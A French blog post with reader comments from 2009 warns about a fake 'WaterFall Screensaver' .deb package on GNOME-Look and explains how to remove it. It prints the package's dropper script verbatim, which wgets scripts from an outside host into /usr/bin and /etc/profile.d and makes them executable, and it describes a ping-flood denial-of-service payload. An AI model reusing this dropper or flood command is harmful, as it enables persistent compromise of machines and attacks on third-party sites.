Téléchargé à partir d'un site de partage d'artworks pour GNOME, le fichier app5552.deb récupéré hors des sources d'installations de la distribution Linux Ubuntu contenait une commande wget de récupération d'un autre script avec pour finalité un ping répété 65507 fois vers le site mmowned.com (ping -s 65507 www.mmowned.com)
le script de base
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
Si vous avez tenté d'installer un écran de veille dénommé "WaterFall Screensaver" pour GNOME dernièrement sur le site GNOME-Look, vérifiez si votre machine contiendrait le fameux script en exécutant la commande "locate Auto.bash".
Si la commande retourne la ligne "/usr/bin/Auto.bash", lancez
"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash"
puis "sudo dpkg -r app5552" dans un terminal pour supprimer les scripts.
Adresse d'origine du faux écran de veille sur GNOME-Look.org :
http://gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772
6 réactions
1 De zick - 17/12/2009, 15:25
C'est mort ...
wget http://05748.t35.com/Bots/Auto.bash
--2009-12-17 15:21:43-- http://05748.t35.com/Bots/Auto.bash
Résolution de 05748.t35.com... 69.10.48.106, 66.45.237.212
Connexion vers 05748.t35.com|69.10.48.106|:80... connecté.
requête HTTP transmise, en attente de la réponse... 403 Forbidden
2009-12-17 15:21:43 ERREUR 403: Forbidden.
wget http://05748.t35.com/Bots/gnome.sh
--2009-12-17 15:23:50-- http://05748.t35.com/Bots/gnome.sh
Résolution de 05748.t35.com... 66.45.237.212, 69.10.48.106
Connexion vers 05748.t35.com|66.45.237.212|:80... connecté.
requête HTTP transmise, en attente de la réponse... 403 Forbidden
2009-12-17 15:23:50 ERREUR 403: Forbidden.
2 De JokuHech - 17/12/2009, 16:58
Mouahahaha !! Comme disent les linuxiens... Lulz
3 De habana - 18/12/2009, 01:13
Une nuisance provenant d'une source non sûre, hors dépôts et qui nécessitait quand même le mot de passe administrateur pour être installé.
4 De from http://05748.t35.com/ google cach - 23/12/2009, 03:51
from http://05748.t35.com/ google cache
"If your reading this from coming that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off! "
5 De tob - 27/12/2009, 19:45
"et qui nécessitait quand même le mot de passe administrateur pour être installé."
Ah bon ? Parce que d'habitude vous n'avez pas besoin du mot de passe administrateur pour installer quelque chose sous Linux ? Bonjour la sécurité.
6 De habana - 29/12/2009, 00:55
L'intallation d'un programme à partir des dépôts officiels de la distribution, officieux, isolé ou encore à partir de la compilation des sources nécessite d'être fait à partir d'un compte administrateur ou les droits d'administration pour être installé au sein du système.